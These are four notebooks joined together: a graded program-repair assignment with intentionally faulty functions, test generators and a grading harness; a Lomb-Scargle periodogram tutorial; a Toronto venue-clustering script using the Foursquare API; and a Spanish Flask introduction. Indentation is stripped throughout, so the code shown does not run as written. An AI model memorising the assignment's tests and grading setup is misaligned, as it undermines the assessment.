# The function `debug_and_repair()` is the function that needs to implement everything. We will provide you with the function to be repaired, as well as testcases for this function and a test-function. Let us show you how the function can be used and should behave:
# + slideshow={"slide_type": "fragment"}
random.seed(42)
# + slideshow={"slide_type": "subslide"}
def simple_debug_and_repair(f, testcases, function_test,
log=False):
'''
Debugs a function with the given testcases and the test_function
and tries to repair it afterwards.
Parameters
----------
f : function
The faulty function, to be debugged and repaired
testcases : List
A list that includes test inputs for the function under test
test_function : function
A function, that takes the test inputs and tests whether the
function under test produces the correct output.
log: bool
Turn logging on/off.
Returns
-------
str
The repaired version of f as a string.
'''
debugger = OchiaiDebugger()
for i in testcases:
with debugger:
function_test(*i) # Ensure that you use *i here.
repairer = Repairer(debugger,
mutator_class=ConditionMutator,
crossover_class=CrossoverOperator,
reducer_class=DeltaDebugger,
log=log)
# Ensure that you specify a sufficient number of
# iterations to evolve.
best_tree, fitness = repairer.repair(iterations=100) # type: ignore
return astor.to_source(best_tree)
# + [markdown] slideshow={"slide_type": "subslide"}
# Here we again used the _Ochiai_ statistical debugger and the _Repairer_ described in [The Debugging Book](https://www.debuggingbook.org/beta/html/Repairer.html). In contrast to the initial example, now we used another type of mutator – `ConditionMutator`. It can successfully fix the `larger` function as well.
# + slideshow={"slide_type": "fragment"}
repaired = simple_debug_and_repair(larger,
LARGER_PASSING_TESTCASES +
LARGER_FAILING_TESTCASES,
larger_test, False)
print_content(repaired, '.py')
# + [markdown] slideshow={"slide_type": "subslide"}
# Although `simple_debug_and_repair` produced a correct solution for our example, it does not generalize to other functions.
# So your task is to create the `debug_and_repair()` function which can be applied on any faulty function.
# + [markdown] slideshow={"slide_type": "fragment"}
# Apart from the function `debug_and_repair()`, you may of course implement your own classes. Make sure, however, that you are using these classes within `debug_and_repair()`. Also, keep in mind to tune the _iteration_ parameter of the `Repairer` so that it has sufficient number of generation to evolve. As it may take too much time to find a solution for an ill-programmed repairer (e.g., consider an infinite `while`loop introduced in the fix), we impose a _10-minute timeout_ for each repair.
# + [markdown] slideshow={"slide_type": "slide"}
# ## Evaluation
# + [markdown] slideshow={"slide_type": "fragment"}
# Having you implement `debug_and_repair()` allows us to easily test your implementation by calling the function with its respective arguments and testing the correctness of its output. In this section, we will provide you with some test cases as well as the testing framework for this project. This will help you to assess the quality of your work.
#
# We define functions as well as test-case generators for these functions. The functions given here should be considered as **public tests**. If you pass all public tests, without hard-coding the solutions, you are guaranteed to achieve **10 points**. The secret tests for the remaining 10 must-have-points have similar defects.
# + [markdown] slideshow={"slide_type": "subslide"}
# ### Factorial
#
# The first function we implement is a _factorial_ function. It is supposed to compute the following formula:
# \begin{equation*}
# n! = \textit{factorial}(n) = \prod_{k=1}^{n}k, \quad \text{for $k\geq 1$}
# \end{equation*}
# + [markdown] slideshow={"slide_type": "fragment"}
# Here we define three faulty functions `factorial1`, `factorial2`, and `factorial3` that are supposed to compute the factorial.
# + slideshow={"slide_type": "subslide"}
def factorial1(n):
res = 1
for i in range(1, n):
res *= i
return res
# + [markdown] slideshow={"slide_type": "fragment"}
# From the first sight, `factorial1` looks to be correctly implemented, still it produces the wrong answer:
# + slideshow={"slide_type": "fragment"}
factorial1(5)
# + [markdown] slideshow={"slide_type": "fragment"}
# while the correct value for 5! is 120.
# + slideshow={"slide_type": "fragment"}
def factorial_testcase():
n = random.randrange(100)
return n
# + slideshow={"slide_type": "subslide"}
def factorial1_test(n):
m = factorial1(n)
assert m == math.factorial(n)
# + slideshow={"slide_type": "fragment"}
def factorial_passing_testcase(): # type: ignore
while True:
try:
n = factorial_testcase()
_ = factorial1_test(n)
return (n,)
except AssertionError:
pass
# + slideshow={"slide_type": "subslide"}
def factorial_failing_testcase(): # type: ignore
while True:
try:
n = factorial_testcase()
_ = factorial1_test(n)
except AssertionError:
return (n,)
# + slideshow={"slide_type": "fragment"}
FACTORIAL_PASSING_TESTCASES_1 = [factorial_passing_testcase() for i in range(TESTS)]
# + slideshow={"slide_type": "fragment"}
FACTORIAL_FAILING_TESTCASES_1 = [factorial_failing_testcase() for i in range(TESTS)]
# + [markdown] slideshow={"slide_type": "fragment"}
# As we can see, our simple Repairer cannot produce a fix. (Or more precisely, the "fix" it produces is pretty much pointless.)
# + slideshow={"slide_type": "subslide"}
repaired = \
simple_debug_and_repair(factorial1,
FACTORIAL_PASSING_TESTCASES_1 +
FACTORIAL_FAILING_TESTCASES_1,
factorial1_test, True)
# + [markdown] slideshow={"slide_type": "subslide"}
# The problem is that the current `Repairer` does not provide a suitable mutation to change the right part of the code.
#
# How can we repair this? Consider extending `StatementMutator` operator such that it can mutate various parts of the code, such as ranges, arithmetic operations, variable names etc. (As a reference of how to do that, look at the `ConditionMutator` class.)
# + [markdown] slideshow={"slide_type": "fragment"}
# The next faulty function is `factorial2()`:
# + slideshow={"slide_type": "fragment"}
def factorial2(n):
i = 1
for i in range(1, n + 1):
i *= i
return i
# + [markdown] slideshow={"slide_type": "fragment"}
# Again, it outputs the incorrect answer:
# + slideshow={"slide_type": "subslide"}
factorial2(5)
# + slideshow={"slide_type": "fragment"}
def factorial2_test(n):
m = factorial2(n)
assert m == math.factorial(n)
# + slideshow={"slide_type": "fragment"}
def factorial_passing_testcase(): # type: ignore
while True:
try:
n = factorial_testcase()
_ = factorial2_test(n)
return (n,)
except AssertionError:
pass
# + slideshow={"slide_type": "subslide"}
def factorial_failing_testcase(): # type: ignore
while True:
try:
n = factorial_testcase()
_ = factorial2_test(n)
except AssertionError:
return (n,)
# + slideshow={"slide_type": "fragment"}
FACTORIAL_PASSING_TESTCASES_2 = [factorial_passing_testcase()
for i in range(TESTS)]
# + slideshow={"slide_type": "fragment"}
FACTORIAL_FAILING_TESTCASES_2 = [factorial_failing_testcase()
for i in range(TESTS)]
# + [markdown] slideshow={"slide_type": "fragment"}
# The third faulty function is `factorial3()`:
# + slideshow={"slide_type": "subslide"}
def factorial3(n):
res = 1
for i in range(1, n + 1):
res += i
return res
# + slideshow={"slide_type": "fragment"}
factorial3(5)
# + slideshow={"slide_type": "fragment"}
def factorial3_test(n):
m = factorial3(n)
assert m == math.factorial(n)
# + slideshow={"slide_type": "subslide"}
def factorial_passing_testcase(): # type: ignore
while True:
try:
n = factorial_testcase()
_ = factorial3_test(n)
return (n,)
except AssertionError:
pass
# + slideshow={"slide_type": "fragment"}
def factorial_failing_testcase(): # type: ignore
while True:
try:
n = factorial_testcase()
_ = factorial3_test(n)
except AssertionError:
return (n,)
# + slideshow={"slide_type": "subslide"}
FACTORIAL_PASSING_TESTCASES_3 = [factorial_passing_testcase()
for i in range(TESTS)]
# + slideshow={"slide_type": "fragment"}
FACTORIAL_FAILING_TESTCASES_3 = [factorial_failing_testcase()
for i in range(TESTS)]
# + [markdown] slideshow={"slide_type": "subslide"}
# ### Middle
#
# The following faulty function is the already well known _Middle_ function, though with another defect.
# + slideshow={"slide_type": "subslide"}
def middle(x, y, z):
if x < x:
if y < z:
return y
if x < z:
return z
return x
if x < z:
return x
if y < z:
return z
return y
# + [markdown] slideshow={"slide_type": "fragment"}
# It should return the second largest number of the input, but it does not:
# + slideshow={"slide_type": "subslide"}
middle(2, 3, 1)
# + slideshow={"slide_type": "fragment"}
def middle_testcase():
x = random.randrange(10)
y = random.randrange(10)
z = random.randrange(10)
return x, y, z
# + slideshow={"slide_type": "fragment"}
def middle_test(x, y, z):
m = middle(x, y, z)
assert m == sorted([x, y, z])[1]
# + slideshow={"slide_type": "subslide"}
def middle_passing_testcase():
while True:
try:
x, y, z = middle_testcase()
_ = middle_test(x, y, z)
return x, y, z
except AssertionError:
pass
# + slideshow={"slide_type": "fragment"}
def middle_failing_testcase():
while True:
try:
x, y, z = middle_testcase()
_ = middle_test(x, y, z)
except AssertionError:
return x, y, z
# + slideshow={"slide_type": "subslide"}
MIDDLE_PASSING_TESTCASES = [middle_passing_testcase()
for i in range(TESTS)]
# + slideshow={"slide_type": "fragment"}
MIDDLE_FAILING_TESTCASES = [middle_failing_testcase()
for i in range(TESTS)]
# + [markdown] slideshow={"slide_type": "subslide"}
# ### Power
#
# The power function should implement the following formular:
# \begin{equation*}
# \textit{power}(x, n) = x^n, \quad \text{for $x\geq 0$ and $n \geq 0$}
# \end{equation*}
# + slideshow={"slide_type": "fragment"}
def power(x, n):
res = 1
for i in range(0, x):
res *= n
return res
# + [markdown] slideshow={"slide_type": "fragment"}
# However, this `power()` function either has an uncommon interpretation of $x^y$ – or it is simply wrong:
# + slideshow={"slide_type": "subslide"}
power(2, 5)
# + [markdown] slideshow={"slide_type": "fragment"}
# We go with the simpler explanation that `power()` is wrong. The correct value, of course, should be $2^5 = 32$.
# + slideshow={"slide_type": "fragment"}
def power_testcase():
x = random.randrange(100)
n = random.randrange(100)
return x, n
# + slideshow={"slide_type": "fragment"}
def power_test(x, n):
m = power(x, n)
assert m == pow(x, n)
# + slideshow={"slide_type": "subslide"}
def power_passing_testcase():
while True:
try:
x, n = power_testcase()
_ = power_test(x, n)
return x, n
except AssertionError:
pass
# + slideshow={"slide_type": "fragment"}
def power_failing_testcase():
while True:
try:
x, n = power_testcase()
_ = power_test(x, n)
except AssertionError:
return x, n
# + slideshow={"slide_type": "subslide"}
POWER_PASSING_TESTCASES = [power_passing_testcase()
for i in range(TESTS)]
# + slideshow={"slide_type": "fragment"}
POWER_FAILING_TESTCASES = [power_failing_testcase()
for i in range(TESTS)]
# + [markdown] slideshow={"slide_type": "subslide"}
# ### Tester Class
# + [markdown] slideshow={"slide_type": "fragment"}
# To make it convenient to test your solution we provide a testing framework:
# + slideshow={"slide_type": "skip"}
import re
# + slideshow={"slide_type": "subslide"}
class Test:
def __init__(self, function, testcases,
test_function, assert_function):
self.function = function
self.testcases = testcases
self.test_function = test_function
self.assert_function = assert_function
def run(self, repair_function):
repaired = repair_function(self.function,
self.testcases,
self.test_function)
repaired = re.sub(self.function.__name__, 'foo', repaired)
exec(repaired, globals())
for test in self.testcases:
res = foo(*test)
assert res == self.assert_function(*test)
# + slideshow={"slide_type": "subslide"}
def middle_assert(x, y, z):
return sorted([x, y, z])[1]
# + slideshow={"slide_type": "fragment"}
test0 = Test(factorial1, FACTORIAL_PASSING_TESTCASES_1 + FACTORIAL_FAILING_TESTCASES_1, factorial1_test, math.factorial)
test1 = Test(factorial2, FACTORIAL_PASSING_TESTCASES_2 + FACTORIAL_FAILING_TESTCASES_2, factorial2_test, math.factorial)
test2 = Test(factorial3, FACTORIAL_PASSING_TESTCASES_3 + FACTORIAL_FAILING_TESTCASES_3, factorial3_test, math.factorial)
test3 = Test(middle, MIDDLE_PASSING_TESTCASES + MIDDLE_FAILING_TESTCASES, middle_test, middle_assert)
test4 = Test(power, POWER_PASSING_TESTCASES + POWER_FAILING_TESTCASES, power_test, pow)
# + slideshow={"slide_type": "fragment"}
tests = [test0, test1, test2, test3, test4]
# + slideshow={"slide_type": "subslide"}
class Tester:
def __init__(self, function, tests):
self.function = function
self.tests = tests
random.seed(42) # We use this seed for our evaluation; don't change it.
def run_tests(self):
for test in self.tests:
try:
test.run(self.function)
print(f'Test {test.function.__name__}: OK')
except AssertionError:
print(f'Test {test.function.__name__}: Failed')
# + slideshow={"slide_type": "subslide"}
tester = Tester(simple_debug_and_repair, tests) # TODO: replace simple_debug_and_repair by your debug_and_repair function
tester.run_tests()
# + [markdown] slideshow={"slide_type": "fragment"}
# By executing the `Tester` as shown above, you can assess the quality of your repairing approach, by testing your own `debug_and_repair()` function.
# + [markdown] slideshow={"slide_type": "slide"}
# ## Grading
#
# Your project will be graded by _automated tests_. The tests are executed in the same manner as shown above.
# In total there are **20 points** + **10 bonus points** to be awarded for this project. **20 points** for the must-haves, **10 bonus points** for may-haves.
# + [markdown] slideshow={"slide_type": "subslide"}
# ### Must-Haves (20 points)
#
# Must haves include an implementation of the `debug_and_repair` function in a way that it automatically repairs faulty functions given sufficiantly large test suites.
# **10 points** are awarded for passing the tests in this notebook. Each passing test being worth two points.
# **10 points** are awarded for passing secret tests.
# + [markdown] slideshow={"slide_type": "subslide"}
# ### May-Haves (10 points)
#
# May-haves will also be tested with secret tests, and award **2 points** each. The may-have-features for this project are a more robust implementation, that is able to cope with a wider range of defects:
#
# * Infinite loops
# * Infinite recursion (`RecursionError` in Python)
# * Type errors (`TypeError` in Python)
# * Undefined identifiers (`NameError` in Python)
# + [markdown] slideshow={"slide_type": "subslide"}
# ### General Rules
#
# You need to achieve at least **10 points** to be awarded any points at all.
# Tests must be passed without hard-coding results, otherwise no points are awarded.
# Your code needs to be sufficiently documented in order to achieve points!
|
notebooks/Repairing_Code.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Fast Lomb-Scargle Periodograms in Python
#
# The Lomb-Scargle Periodogram is a well-known method of finding periodicity in irregularly-sampled time-series data.
# The common implementation of the periodogram is relatively slow: for $N$ data points, a frequency grid of $\sim N$ frequencies is required and the computation scales as $O[N^2]$.
# In a 1989 paper, Press and Rybicki presented a faster technique which makes use of fast Fourier transforms to reduce this cost to $O[N\log N]$ on a regular frequency grid.
# The ``gatspy`` package implement this in the ``LombScargleFast`` object, which we'll explore below.
#
# But first, we'll motivate *why* this algorithm is needed at all.
# We'll start this notebook with some standard imports:
# +
# %matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
# use seaborn's default plotting styles for matplotlib
import seaborn; seaborn.set()
# -
# To begin, let's make a function which will create $N$ noisy, irregularly-spaced data points containing a periodic signal, and plot one realization of that data:
# +
def create_data(N, period=2.5, err=0.1, rseed=0):
rng = np.random.RandomState(rseed)
t = np.arange(N, dtype=float) + 0.3 * rng.randn(N)
y = np.sin(2 * np.pi * t / period) + err * rng.randn(N)
return t, y, err
t, y, dy = create_data(100, period=20)
plt.errorbar(t, y, dy, fmt='o');
# -
# From this, our algorithm should be able to identify any periodicity that is present.
# ## Choosing the Frequency Grid
# The Lomb-Scargle Periodogram works by evaluating a power for a set of candidate frequencies $f$. So the first question is, how many candidate frequencies should we choose?
# It turns out that this question is *very* important. If you choose the frequency spacing poorly, it may lead you to miss strong periodic signal in the data!
# ### Frequency spacing
# First, let's think about the frequency spacing we need in our grid. If you're asking about a candidate frequency $f$, then data with range $T$ contains $T \cdot f$ complete cycles. If our error in frequency is $\delta f$, then $T\cdot\delta f$ is the error in number of cycles between the endpoints of the data.
# If this error is a significant fraction of a cycle, this will cause problems. This givs us the criterion
# $$
# T\cdot\delta f \ll 1
# $$
# Commonly, we'll choose some oversampling factor around 5 and use $\delta f = (5T)^{-1}$ as our frequency grid spacing.
# ### Frequency limits
# Next, we need to choose the limits of the frequency grid. On the low end, $f=0$ is suitable, but causes some problems – we'll go one step away and use $\delta f$ as our minimum frequency.
# But on the high end, we need to make a choice: what's the highest frequency we'd trust our data to be sensitive to?
# At this point, many people are tempted to mis-apply the Nyquist-Shannon sampling theorem, and choose some version of the Nyquist limit for the data.
# But this is entirely wrong! The Nyquist frequency applies for regularly-sampled data, but irregularly-sampled data can be sensitive to much, much higher frequencies, and the upper limit should be determined based on what kind of signals you are looking for.
#
# Still, a common (if dubious) rule-of-thumb is that the high frequency is some multiple of what Press & Rybicki call the "average" Nyquist frequency,
# $$
# \hat{f}_{Ny} = \frac{N}{2T}
# $$
# With this in mind, we'll use the following function to determine a suitable frequency grid:
def freq_grid(t, oversampling=5, nyquist_factor=3):
T = t.max() - t.min()
N = len(t)
df = 1. / (oversampling * T)
fmax = 0.5 * nyquist_factor * N / T
N = int(fmax // df)
return df + df * np.arange(N)
# Now let's use the ``gatspy`` tools to plot the periodogram:
t, y, dy = create_data(100, period=2.5)
freq = freq_grid(t)
print(len(freq))
from gatspy.periodic import LombScargle
model = LombScargle().fit(t, y, dy)
period = 1. / freq
power = model.periodogram(period)
plt.plot(period, power)
plt.xlim(0, 5);
# The algorithm finds a strong signal at a period of 2.5.
#
# To demonstrate explicitly that the Nyquist rate doesn't apply in irregularly-sampled data, let's use a period below the averaged sampling rate and show that we can find it:
# +
t, y, dy = create_data(100, period=0.3)
period = 1. / freq_grid(t, nyquist_factor=10)
model = LombScargle().fit(t, y, dy)
power = model.periodogram(period)
plt.plot(period, power)
plt.xlim(0, 1);
# -
# With a data sampling rate of approximately $1$ time unit, we easily find a period of $0.3$ time units. The averaged Nyquist limit clearly does not apply for irregularly-spaced data!
# Nevertheless, short of a full analysis of the temporal window function, it remains a useful milepost in estimating the upper limit of frequency.
# ### Scaling with $N$
# With these rules in mind, we see that the size of the frequency grid is approximately
# $$
# N_f = \frac{f_{max}}{\delta f} \propto \frac{N/(2T)}{1/T} \propto N
# $$
# So for $N$ data points, we will require some multiple of $N$ frequencies (with a constant of proportionality typically on order 10) to suitably explore the frequency space.
# This is the source of the $N^2$ scaling of the typical periodogram: finding periods in $N$ datapoints requires a grid of $\sim 10N$ frequencies, and $O[N^2]$ operations.
# When $N$ gets very, very large, this becomes a problem.
# ## Fast Periodograms with ``LombScargleFast``
# Finally we get to the meat of this discussion.
#
# In a [1989 paper](http://adsabs.harvard.edu/full/1989ApJ...338..277P), Press and Rybicki proposed a clever method whereby a Fast Fourier Transform is used on a grid *extirpolated* from the original data, such that this problem can be solved in $O[N\log N]$ time. The ``gatspy`` package contains a pure-Python implementation of this algorithm, and we'll explore it here.
# If you're interested in seeing how the algorithm works in Python, check out the code in [the gatspy source](https://github.com/astroML/gatspy/blob/master/gatspy/periodic/lomb_scargle_fast.py).
# It's far more readible and understandable than the Fortran source presented in Press *et al.*
#
# For convenience, the implementation has a ``periodogram_auto`` method which automatically selects a frequency/period range based on an oversampling factor and a nyquist factor:
from gatspy.periodic import LombScargleFast
help(LombScargleFast.periodogram_auto)
# +
from gatspy.periodic import LombScargleFast
t, y, dy = create_data(100)
model = LombScargleFast().fit(t, y, dy)
period, power = model.periodogram_auto()
plt.plot(period, power)
plt.xlim(0, 5);
# -
# Here, to illustrate the different computational scalings, we'll evaluate the computational time for a number of inputs, using ``LombScargleAstroML`` (a fast implementation of the $O[N^2]$ algorithm) and ``LombScargleFast``, which is the fast FFT-based implementation:
# +
from time import time
from gatspy.periodic import LombScargleAstroML, LombScargleFast
def get_time(N, Model):
t, y, dy = create_data(N)
model = Model().fit(t, y, dy)
t0 = time()
model.periodogram_auto()
t1 = time()
result = t1 - t0
# for fast operations, we should do several and take the median
if result < 0.1:
N = min(50, 0.5 / result)
times = []
for i in range(5):
t0 = time()
model.periodogram_auto()
t1 = time()
times.append(t1 - t0)
result = np.median(times)
return result
N_obs = list(map(int, 10 ** np.linspace(1, 4, 5)))
times1 = [get_time(N, LombScargleAstroML) for N in N_obs]
times2 = [get_time(N, LombScargleFast) for N in N_obs]
# -
plt.loglog(N_obs, times1, label='Naive Implmentation')
plt.loglog(N_obs, times2, label='FFT Implementation')
plt.xlabel('N observations')
plt.ylabel('t (sec)')
plt.legend(loc='upper left');
# For fewer than 100 observations, the naive implementation wins out, but as the number of points grows, we observe the clear trends in scaling: $O[N^2]$ for the Naive method, and $O[N\log N]$ for the fast method. We could push this plot higher, but the trends are already clear: for $10^5$ points, while the FFT method would complete in a couple seconds, the Naive method would take nearly two hours! Who's got the time for that plot?
|
examples/FastLombScargle.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Parse table from Wikipedia webpage
# + pycharm={"name": "#%%\n"}
import pandas as pd # library for data analysis
from bs4 import BeautifulSoup # library to parse web pages
import requests # library to handle requests
import csv
import folium # map rendering library
from sklearn.cluster import KMeans
import numpy as np
# Matplotlib and associated plotting modules
import matplotlib.cm as cm
import matplotlib.colors as colors
# + [markdown] pycharm={"name": "#%% md\n"}
# get credentials from local file
# + pycharm={"name": "#%%\n"}
from credentials import CLIENT_ID, CLIENT_SECRET, VERSION, LIMIT
# + pycharm={"name": "#%%\n"}
coordinate_data = {}
with open('Geospatial_Coordinates.csv') as in_file:
data = csv.DictReader(in_file)
for row in data:
coordinate_data[row['Postal Code']] = {'longitude': row['Longitude'],
'latitude': row['Latitude']}
def get_coordinates(postal_code):
ret = coordinate_data.get(postal_code, {})
latitude = ret.get('latitude')
longitude = ret.get('longitude')
return longitude, latitude
# + pycharm={"name": "#%%\n"}
def get_data_from_wikipedia(url):
req = requests.get(url)
soup = BeautifulSoup(req.content, 'html.parser')
#print(soup.prettify())
data = []
table = soup.find('table', attrs={'class':'wikitable sortable'})
table_body = table.find('tbody')
#print(table_body)
# get the headers of the table and store in a list
table_headers = []
headers = table_body.find_all('th')
for header in headers:
header_value = header.get_text().strip()
table_headers.append(header_value)
row_key_remapping = {'Neighborhood': 'Neighbourhood'}
# get the rows of the table
rows = table_body.find_all('tr')
for row in rows:
row_data = {}
cells = row.find_all('td')
for position, cell in enumerate(cells):
value = cell.get_text().strip()
key = table_headers[position]
key = row_key_remapping[key] if key in row_key_remapping else key
# add the value to a dictionary
row_data[key] = value
# check that there is some data and that Borough is not unassigned
if row_data and row_data.get('Borough', '') != 'Not assigned':
data.append(row_data)
return data
def load_data_into_dataframe(data):
df = pd.DataFrame(data)
# rename the postal code heading
df.rename(columns={"Postal Code": "PostalCode",
"Neighborhood": "Neighbourhood"},
inplace=True)
return df
def add_coordinates(df):
longitude = []
latitude = []
for index, row in df.iterrows():
postal_code = row.get('PostalCode')
row_long, row_lat = get_coordinates(postal_code=postal_code)
longitude.append(float(row_long))
latitude.append(float(row_lat))
df['Latitude'] = latitude
df['Longitude'] = longitude
return df
def getNearbyVenues(names, latitudes, longitudes, radius=500):
venues_list=[]
for name, lat, lng in zip(names, latitudes, longitudes):
url = 'https://api.foursquare.com/v2/venues/explore?&client_id={}&client_secret={}&v={}&ll={},{}&radius={}&limit={}'.format(
CLIENT_ID,
CLIENT_SECRET,
VERSION,
lat,
lng,
radius,
LIMIT)
print(url)
results = requests.get(url).json()["response"]['groups'][0]['items']
venues_list.append([(
name,
lat,
lng,
v['venue']['name'],
v['venue']['location']['lat'],
v['venue']['location']['lng'],
v['venue']['categories'][0]['name']) for v in results])
nearby_venues = pd.DataFrame([item for venue_list in venues_list for item in venue_list])
nearby_venues.columns = ['Neighborhood',
'Neighborhood Latitude',
'Neighborhood Longitude',
'Venue',
'Venue Latitude',
'Venue Longitude',
'Venue Category']
return nearby_venues
def process_url(url):
data = get_data_from_wikipedia(url=url)
df = load_data_into_dataframe(data=data)
df = add_coordinates(df=df)
nearby_venues = getNearbyVenues(names=df['Neighbourhood'],
latitudes=df['Latitude'],
longitudes=df['Longitude'])
print('There are {} uniques categories.'.format(len(nearby_venues['Venue Category'].unique())))
temp_nearby_venues = nearby_venues
temp_nearby_venues['count'] = np.zeros(len(temp_nearby_venues))
venue_counts = temp_nearby_venues.groupby(['Neighbourhood', 'Venue Category']).count()
print(venue_counts[(venue_counts['count'] > 2)])
onehot = pd.get_dummies(nearby_venues[['Venue Category']], prefix="", prefix_sep="")
# add neighborhood column back to dataframe
onehot['Neighbourhood'] = nearby_venues['Neighbourhood']
grouped = onehot.groupby('Neighbourhood').mean().reset_index()
print(grouped.head())
return df, grouped
# function to sort the venues in descending order
def return_most_common_venues(row, num_top_venues):
row_categories = row.iloc[1:]
row_categories_sorted = row_categories.sort_values(ascending=False)
return row_categories_sorted.index.values[0:num_top_venues]
def top_10_sorted(grouped):
num_top_venues = 10
indicators = ['st', 'nd', 'rd']
# create columns according to number of top venues
columns = ['Neighbourhood']
for ind in np.arange(num_top_venues):
try:
columns.append('{}{} Most Common Venue'.format(ind+1, indicators[ind]))
except:
columns.append('{}th Most Common Venue'.format(ind+1))
# create a new dataframe
neighborhoods_venues_sorted = pd.DataFrame(columns=columns)
neighborhoods_venues_sorted['Neighbourhood'] = grouped['Neighbourhood']
for ind in np.arange(grouped.shape[0]):
neighborhoods_venues_sorted.iloc[ind, 1:] = return_most_common_venues(grouped.iloc[ind, :], num_top_venues)
neighborhoods_venues_sorted.head()
return neighborhoods_venues_sorted
def cluster_and_merge(df, grouped, neighborhoods_venues_sorted):
# set number of clusters
kclusters = 5
grouped_clustering = grouped.drop('Neighbourhood', 1)
# run k-means clustering
kmeans = KMeans(n_clusters=kclusters, random_state=0).fit(grouped_clustering)
# check cluster labels generated for each row in the dataframe
#kmeans.labels_[0:10]
# add clustering labels
neighborhoods_venues_sorted.insert(0, 'Cluster Labels', kmeans.labels_)
location_merged = df
# merge toronto_grouped with toronto_data to add latitude/longitude for each neighborhood
location_merged = location_merged.join(neighborhoods_venues_sorted.set_index('Neighborhood'), on='Neighborhood')
location_merged.head()
return location_merged
def plot_clusters(df, kclusters):
# create map
map_clusters = folium.Map(location=[latitude, longitude], zoom_start=11)
df = df.dropna()
df['Cluster Labels'] = df['Cluster Labels'].astype('int')
# set color scheme for the clusters
x = np.arange(kclusters)
ys = [i + x + (i*x)**2 for i in range(kclusters)]
colors_array = cm.rainbow(np.linspace(0, 1, len(ys)))
rainbow = [colors.rgb2hex(i) for i in colors_array]
markers_colors = []
for index, row in df.iterrows():
postal_code = row['PostalCode']
lat = row['Latitude']
lon = row['Longitude']
neighbour = row['Neighbourhood']
cluster = row['Cluster Labels']
label = folium.Popup(str(postal_code) + ' Cluster ' + str(neighbour), parse_html=True)
folium.CircleMarker(
[lat, lon],
radius=5,
popup=label,
color=rainbow[cluster-1],
fill=True,
fill_color=rainbow[cluster-1],
fill_opacity=0.7).add_to(map_clusters)
# + pycharm={"name": "#%%\n"}
url = 'https://en.wikipedia.org/wiki/List_of_postal_codes_of_Canada:_M'
toronto_df, toronto_grouped = process_url(url=url)
# + pycharm={"name": "#%%\n"}
toronto_sorted_top_10 = top_10_sorted(toronto_grouped)
# + pycharm={"name": "#%%\n"}
toronto_merged = cluster_and_merge(df=toronto_df, grouped=toronto_grouped,
neighborhoods_venues_sorted=toronto_sorted_top_10)
# + pycharm={"name": "#%%\n"}
plot_clusters(df=toronto_merged)
|
week4.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # FLASK
# -----------------------
# Usaremos Python y una biblioteca llamada **Flask** para escribir nuestro propio servidor web, implementando funciones adicionales. Flask también es un **framework**, donde se establece un conjunto de convenciones para la utilización de sus librerias.
#
# Por ejemplo, al igual que otras librerias, Flask incluye funciones que podemos usar para analizar solicitudes individualmente, pero como framework, también requiere que el código de nuestro programa esté organizado de cierta manera:
# ## Estructura Proyecto Flask
flask-project-name
+--application.py
+--requirements.txt
+--static/
| +--image1
| +--style.css
| +--script.js
+--templates/
| +--index.html
| +--layaout.html
| +--page-n.html
# Donde:
#
# - `application.py` : Código python para nuestro servidor web.
# - `requirements.txt` : Incluye la lista de librerias necesarias para que nuestra solución funciones.
# - `static/` : Directorio de archivos estáticos, tal como CSS y JavaScript files.
# - `templates/` : es un directorio de archivos HTML.
# Existen múltiples framework para cada uno de los lenguajes populares que existen hoy en día. En python entre los populares tenemos Django, Flask, Piramide
# ## Patrón de Diseño en Flask
# Flask también implementa un patrón de **design pattern**, o la forma en que nuestro programa y código están organizados. Para Flask, el patrón de diseño es generalmente MVC o Model-view-controller:
#
# <center><img src='./img/flask-mvc.png'></center>
# Donde:
#
# - El **controller** es nuestra **lógica y código que administra nuestra aplicación en general**, dada la entrada del usuario. En Flask, este será nuestro código Python.
#
# - La **view** es la **interfaz de usuario, como el HTML y CSS que el usuario verá e interactuará**.
#
# - El **model** es **nuestra data** tal como base de datos SQL o CSV
# ## Nuestra Primera aplicacion Flask
# Podemos realizar una simple aplicación web a partir del siguiente código
# +
from flask import Flask
app = Flask(__name__)
@app.route("/")
def hello_world():
return "Hello, Flask!"
# -
# - Primero, importaremos `Flask` de la biblioteca `flask`, que usa una letra mayúscula para su nombre principal.
# - Luego, crearemos una variable de aplicación dando el nombre de nuestro archivo será la variable `Flask`.
# - A continuación, etiquetaremos una función para `/` route o URL con `@app.route`. El símbolo `@` en Python se llama decorador, que aplica una función a otra.
# - Llamaremos a la función `index`, ya que debería responder a una solicitud de `/`, la página predeterminada. Y nuestra función solo responderá con una cadena por ahora.
# #### Ejecución
# -----------------
#
# Para poder ejecutar nuestra script podemos realizar los siguiente pasos sobre **CMD**:
#
# `> set FLASK_APP=python_file_name`
#
# `> flask run`
# * Running on http://127.0.0.1:5000/
#
#
# Actualizaremos nuestro código para devolver HTML con la función `render_template`, que encuentra un archivo dado y devuelve su contenido:
# +
from flask import Flask, render_template
app = Flask(__name__)
@app.route("/")
def index():
return render_template("index.html")
# -
# Tendremos que crear un directorio `templates/` y crear un archivo `index.html` con algo de contenido dentro.
#
# Ahora, escribiendo `flask run` devolverá ese archivo HTML cuando visitemos la URL de nuestro servidor.
# Pasaremos un argumento a `render_template` en nuestro código de controlador:
# +
from flask import Flask, render_template, request
app = Flask(__name__)
@app.route("/")
def index():
return render_template("index.html", name=request.args.get("name", "world"))
# -
# Resulta que podemos darle a `render_template` cualquier argumento, como `name`, y lo sustituirá en nuestra plantilla o en nuestro archivo HTML con marcadores de posición.
#
# - En `index.html`, reemplazaremos `hello, world` con `hello`, para decirle a Flask dónde sustituir la variable `name`:
#
#
# +
<!DOCTYPE html>
<html lang="en">
<head>
<title>hello</title>
</head>
<body>
hello, {{ name }}
</body>
</html>
# -
# - Podemos usar la variable `request` de la biblioteca Flask para obtener un parámetro de la solicitud HTTP, en este caso también el `name`, y volver a un valor predeterminado de `world` si no se proporcionó uno.
